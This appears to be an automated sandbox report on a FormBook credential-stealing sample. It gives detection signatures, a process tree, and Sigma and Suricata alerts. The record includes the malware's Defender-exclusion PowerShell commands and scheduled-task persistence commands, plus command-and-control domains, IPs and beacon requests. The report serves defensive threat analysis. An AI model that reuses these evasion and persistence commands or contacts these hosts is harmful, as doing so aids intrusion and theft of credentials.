Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
n2pGr8w21V.exe

Overview

General Information

Sample name:n2pGr8w21V.exe
renamed because original name is a hash value
Original sample name:5d24a5cb60554c37dd1850f057e8ea8ea021cae00cb7febed5ca6d9768f27502.exe
Analysis ID:1588691
MD5:8d46baf183c4f911ea9bf65c8797d8ea
SHA1:1c65169105317dd39497d511f4c7cc1592fbfb69
SHA256:5d24a5cb60554c37dd1850f057e8ea8ea021cae00cb7febed5ca6d9768f27502
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • n2pGr8w21V.exe (PID: 2620 cmdline: "C:\Users\user\Desktop\n2pGr8w21V.exe" MD5: 8D46BAF183C4F911EA9BF65C8797D8EA)
    • powershell.exe (PID: 7440 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7480 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uEugNEto.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7800 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7512 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7688 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • ISaSZznjXcpoJ.exe (PID: 6428 cmdline: "C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • systray.exe (PID: 8180 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
          • ISaSZznjXcpoJ.exe (PID: 6896 cmdline: "C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1004 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • uEugNEto.exe (PID: 7852 cmdline: C:\Users\user\AppData\Roaming\uEugNEto.exe MD5: 8D46BAF183C4F911EA9BF65C8797D8EA)
    • schtasks.exe (PID: 8084 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8128 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.2508381600.00000000034A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000018.00000002.2513591894.0000000004CD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000017.00000002.2511826108.0000000004DB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000F.00000002.1576124904.0000000001470000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            15.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              15.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\n2pGr8w21V.exe", ParentImage: C:\Users\user\Desktop\n2pGr8w21V.exe, ParentProcessId: 2620, ParentProcessName: n2pGr8w21V.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", ProcessId: 7440, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\n2pGr8w21V.exe", ParentImage: C:\Users\user\Desktop\n2pGr8w21V.exe, ParentProcessId: 2620, ParentProcessName: n2pGr8w21V.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", ProcessId: 7440, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\uEugNEto.exe, ParentImage: C:\Users\user\AppData\Roaming\uEugNEto.exe, ParentProcessId: 7852, ParentProcessName: uEugNEto.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp", ProcessId: 8084, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\n2pGr8w21V.exe", ParentImage: C:\Users\user\Desktop\n2pGr8w21V.exe, ParentProcessId: 2620, ParentProcessName: n2pGr8w21V.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp", ProcessId: 7512, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\n2pGr8w21V.exe", ParentImage: C:\Users\user\Desktop\n2pGr8w21V.exe, ParentProcessId: 2620, ParentProcessName: n2pGr8w21V.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", ProcessId: 7440, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\n2pGr8w21V.exe", ParentImage: C:\Users\user\Desktop\n2pGr8w21V.exe, ParentProcessId: 2620, ParentProcessName: n2pGr8w21V.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp", ProcessId: 7512, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T04:15:55.795996+010028554641A Network Trojan was detected192.168.2.749999188.114.96.380TCP
                2025-01-11T04:17:00.769441+010028554641A Network Trojan was detected192.168.2.749978162.0.215.3380TCP
                2025-01-11T04:17:03.332141+010028554641A Network Trojan was detected192.168.2.749979162.0.215.3380TCP
                2025-01-11T04:17:05.895359+010028554641A Network Trojan was detected192.168.2.749980162.0.215.3380TCP
                2025-01-11T04:17:14.012290+010028554641A Network Trojan was detected192.168.2.749982104.18.73.11680TCP
                2025-01-11T04:17:16.576340+010028554641A Network Trojan was detected192.168.2.749983104.18.73.11680TCP
                2025-01-11T04:17:19.121223+010028554641A Network Trojan was detected192.168.2.749984104.18.73.11680TCP
                2025-01-11T04:17:28.228467+010028554641A Network Trojan was detected192.168.2.749986192.185.147.10080TCP
                2025-01-11T04:17:30.351099+010028554641A Network Trojan was detected192.168.2.749987192.185.147.10080TCP
                2025-01-11T04:17:32.930452+010028554641A Network Trojan was detected192.168.2.749988192.185.147.10080TCP
                2025-01-11T04:17:40.765854+010028554641A Network Trojan was detected192.168.2.74999013.248.169.4880TCP
                2025-01-11T04:17:43.321805+010028554641A Network Trojan was detected192.168.2.74999113.248.169.4880TCP
                2025-01-11T04:17:45.866714+010028554641A Network Trojan was detected192.168.2.74999213.248.169.4880TCP
                2025-01-11T04:17:58.927917+010028554641A Network Trojan was detected192.168.2.74999415.197.148.3380TCP
                2025-01-11T04:18:01.489180+010028554641A Network Trojan was detected192.168.2.74999515.197.148.3380TCP
                2025-01-11T04:18:04.955418+010028554641A Network Trojan was detected192.168.2.74999615.197.148.3380TCP
                2025-01-11T04:18:13.859937+010028554641A Network Trojan was detected192.168.2.749998188.114.96.380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeReversingLabs: Detection: 68%
                Multi AV Scanner detection for submitted file
                Source: n2pGr8w21V.exeReversingLabs: Detection: 68%
                Yara detected FormBook
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.2508381600.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.2513591894.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2511826108.0000000004DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1576124904.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2507252400.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2511173788.0000000003760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1578348944.00000000022B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: n2pGr8w21V.exeJoe Sandbox ML: detected
                Source: n2pGr8w21V.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: n2pGr8w21V.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: systray.pdb source: RegSvcs.exe, 0000000F.00000002.1575865411.0000000001107000.00000004.00000020.00020000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000002.2510055653.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.1575865411.0000000001107000.00000004.00000020.00020000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000002.2510055653.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ISaSZznjXcpoJ.exe, 00000016.00000002.2507158297.000000000081E000.00000002.00000001.01000000.0000000E.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2509185482.000000000081E000.00000002.00000001.01000000.0000000E.sdmp
                Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000017.00000002.2508850216.0000000003522000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512922275.000000000582C000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.1878823883.00000000353FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: OavGB.pdb source: n2pGr8w21V.exe, uEugNEto.exe.0.dr
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1575412489.0000000004EAD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.000000000539E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.0000000005200000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1577378357.000000000505A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1575412489.0000000004EAD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.000000000539E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.0000000005200000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1577378357.000000000505A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: systray.exe, 00000017.00000002.2508850216.0000000003522000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512922275.000000000582C000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.1878823883.00000000353FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: OavGB.pdbSHA256g source: n2pGr8w21V.exe, uEugNEto.exe.0.dr
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 4x nop then jmp 0BFB07D3h17_2_0BFB1008

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 162.0.215.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 15.197.148.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 162.0.215.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 104.18.73.116:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 192.185.147.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 104.18.73.116:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 15.197.148.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 192.185.147.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 162.0.215.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 15.197.148.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 192.185.147.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 104.18.73.116:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 188.114.96.3:80
                Source: Joe Sandbox ViewIP Address: 162.0.215.33 162.0.215.33
                Source: Joe Sandbox ViewIP Address: 104.18.73.116 104.18.73.116
                Source: Joe Sandbox ViewIP Address: 104.18.73.116 104.18.73.116
                Source: Joe Sandbox ViewIP Address: 15.197.148.33 15.197.148.33
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /cs9k/?MHJ0GXi=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gqPapChlQiVLnuWWyjSHSngUOewn7sS2CIDtXVuGZPpJOLluzJeAwPaf/&nHI4y=ULkH023p-2 HTTP/1.1Host: www.holytur.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /30le/?MHJ0GXi=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+BH+AK0OJhf+I7eM6xe7113ZbRKEe7/cQK41GtHqpeCJq4WZTqkgr8MY5&nHI4y=ULkH023p-2 HTTP/1.1Host: www.nieuws-july202488.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /s15n/?nHI4y=ULkH023p-2&MHJ0GXi=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHyT0LsuYRSsPCWoh575Uq8xJMJajdjvw7bNvPz2QoSF69NC7qAb+tKFkF HTTP/1.1Host: www.losmason.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHlNeLLSejHELaV5PyBe2QzNbQvUHYc/0M0Tzmov1eC9unFVYK6Dr3q02N&nHI4y=ULkH023p-2 HTTP/1.1Host: www.hayaniya.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /rxts/?nHI4y=ULkH023p-2&MHJ0GXi=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmI/FI9mNBtfUcHsH1BXvHeC8ccNMTzjG08xLSDUiWAIgxE0vpFMVGa825 HTTP/1.1Host: www.lovel.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /zs4o/?MHJ0GXi=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYrRUrNMNQgIXAOg6Dx5ZtNmZ3l7Xsr8IlhehM93LMclm51whCbAvUXWV5&nHI4y=ULkH023p-2 HTTP/1.1Host: www.duskgazes.workAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.holytur.net
                Source: global trafficDNS traffic detected: DNS query: www.nieuws-july202488.sbs
                Source: global trafficDNS traffic detected: DNS query: www.losmason.shop
